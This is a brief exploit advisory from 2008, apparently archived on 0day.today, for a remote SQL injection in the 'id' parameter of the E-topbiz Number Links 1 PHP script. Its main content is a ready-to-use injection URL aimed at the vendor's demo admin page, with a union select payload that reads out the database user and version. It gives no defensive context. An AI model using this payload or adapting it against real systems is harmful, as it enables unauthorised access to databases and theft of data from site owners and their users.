id: 4123
date: 11/07/2008
title: E-topbiz Number Links 1 (id) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

===============================================================
E-topbiz Number Links 1 (id) Remote SQL Injection Vulnerability
===============================================================



e-topbiz Number Links 1 php  ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script    : http://e-topbiz.com/oprema/pages/numberlinks1.php

_____

ExploiT & Demo
______________

http://e-topbiz.com/trafficdemos/numberlinks1/admin/admin_catalog.php?action=edit&id=-2+union+select+concat(user

(),0x3e,version()),2,3,4,5--




#  0day.today [2023-03-24]  #